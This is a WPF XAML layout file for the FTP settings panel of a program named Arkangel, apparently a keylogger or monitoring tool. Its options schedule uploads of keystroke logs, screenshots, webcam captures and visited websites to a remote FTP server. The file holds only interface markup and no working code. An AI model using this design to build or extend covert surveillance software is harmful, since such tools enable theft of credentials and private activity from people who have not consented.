Arkangel/Arkangel/FTP.xaml

<UserControl x:Class="Arkangel.FTP"
             xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
             xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
             xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" 
             xmlns:d="http://schemas.microsoft.com/expression/blend/2008" 
             xmlns:local="clr-namespace:Arkangel"
             mc:Ignorable="d" 
             d:DesignHeight="450" d:DesignWidth="800">
    <Grid>
        <TabControl BorderBrush="White">
            <TabItem Header="General" FontSize="30">
                <StackPanel>
                    <GroupBox Header="Enable/Disable" FontSize="20" Height="70" Padding="3">
                        <Grid>
                            <Grid.ColumnDefinitions>
                                <ColumnDefinition Width="300*"/>
                                <ColumnDefinition Width="95*"/>
                                <ColumnDefinition Width="381*"/>
                            </Grid.ColumnDefinitions>


                            <CheckBox Grid.ColumnSpan="3">Try to upload logs by FTP every _________ hours ________ minutes</CheckBox>
                            <TextBox Margin="26,0,23,0" Grid.Column="1" BorderBrush="#89FFFFFF"/>
                            <TextBox Grid.Column="2" Width="36" HorizontalAlignment="Left" Margin="38,0,0,0" RenderTransformOrigin="0.238,0.569" BorderBrush="#89FFFFFF"></TextBox>
                        </Grid>
                    </GroupBox>
                    <TextBlock Height="5"></TextBlock>
                    <GroupBox Header="Upload" FontSize="20" Height="124" Padding="3,9,9,9">
                        <Grid>
                            <Grid.RowDefinitions>
                                <RowDefinition/>
                                <RowDefinition/>
                            </Grid.RowDefinitions>
                            <Grid.ColumnDefinitions>
                                <ColumnDefinition/>
                                <ColumnDefinition/>
                            </Grid.ColumnDefinitions>
                            <CheckBox>Text logs (keystroke)</CheckBox>
                            <CheckBox Grid.Column="1" >Visual logs (Image)</CheckBox>
                            <CheckBox Grid.Row="1">Webcam</CheckBox>
                            <CheckBox Grid.Column="1" Grid.Row="1">Website</CheckBox>
                        </Grid>
                    </GroupBox>
                    <TextBlock Height="5"></TextBlock>
                    <GroupBox Header="Additional Option" FontSize="20" Height="116" Padding="3,3,3,3">
                        <StackPanel>
                            <Grid Height="38">
                                <Grid.ColumnDefinitions>
                                    <ColumnDefinition Width="407*"/>
                                    <ColumnDefinition Width="369*"/>
                                </Grid.ColumnDefinitions>
                                <CheckBox Grid.ColumnSpan="2">Upload only when the log size is more than ___________ Kbs</CheckBox>
                                <TextBox Margin="32,0,256,0" CaretBrush="White" Grid.Column="1" BorderBrush="#89FFFFFF"/>
                            </Grid>
                            <CheckBox Height="32">Clear the logs after successful uploading</CheckBox>
                        </StackPanel>
                    </GroupBox>
                    <Button HorizontalAlignment="Right" Width="160" Margin="0,20,30,0">OK</Button>
                </StackPanel>
            </TabItem>
            <TabItem Header="FTP Sever" FontSize="30">
                <StackPanel>
                    <GroupBox Header="Information" FontSize="20" Height="305" Padding="9">
                        <StackPanel Margin="0,0,0,10">
                            <Grid>
                                <Grid.ColumnDefinitions>
                                    <ColumnDefinition Width="75*"/>
                                    <ColumnDefinition Width="319*"/>
                                </Grid.ColumnDefinitions>
                                <TextBlock HorizontalAlignment="Left" Width="106" Margin="0,0,0,10"><Run Text="Host Server:"/></TextBlock>
                                <TextBox Grid.Column="1" Margin="0,-10,270,10"/>
                            </Grid>
                            <Grid>
                                <Grid.ColumnDefinitions>
                                    <ColumnDefinition Width="75*"/>
                                    <ColumnDefinition Width="319*"/>
                                </Grid.ColumnDefinitions>
                                <TextBlock Grid.ColumnSpan="2" Width="auto" Margin="0,0,0,10"><Run Text="Username:"/></TextBlock>
                                <TextBox Margin="0,-10,270,10" Grid.Column="1"/>
                            </Grid>
                            <Grid>
                                <Grid.ColumnDefinitions>
                                    <ColumnDefinition Width="150*"/>
                                    <ColumnDefinition Width="639*"/>
                                </Grid.ColumnDefinitions>
                                <TextBlock Grid.ColumnSpan="2"><Run Text="Password:"/></TextBlock>
                                <TextBox Grid.Column="1" Margin="0,-10,269,10"/>
                            </Grid>
                            <Grid>
                                <Grid.ColumnDefinitions>
                                    <ColumnDefinition Width="75*"/>
                                    <ColumnDefinition Width="319*"/>
                                </Grid.ColumnDefinitions>
                                <TextBlock Grid.ColumnSpan="2" Margin="0,0,269,0"><Run Text="Romote dir:"/></TextBlock>
                                <TextBox Grid.Column="1" Margin="0,-10,269,10" />
                            </Grid>
                            <TextBlock HorizontalAlignment="Center"><Run Text="Remote dir is the directory on the FTP server when you want to store logs file."/></TextBlock>
                            <TextBlock HorizontalAlignment="Center" Width="685"><Run Text="You can leave it blank to store logs at the intinal directory."/></TextBlock>
                            <CheckBox HorizontalAlignment="Center" Height="auto" Content="Use passive mode (this mabe neccessary for some firewalls)"/>
                        </StackPanel>
                    </GroupBox>
                    <Button HorizontalAlignment="Right" Width="160" Margin="0,30,30,0" Content="OK"/>
                </StackPanel>
            </TabItem>
        </TabControl>
    </Grid>
</UserControl>
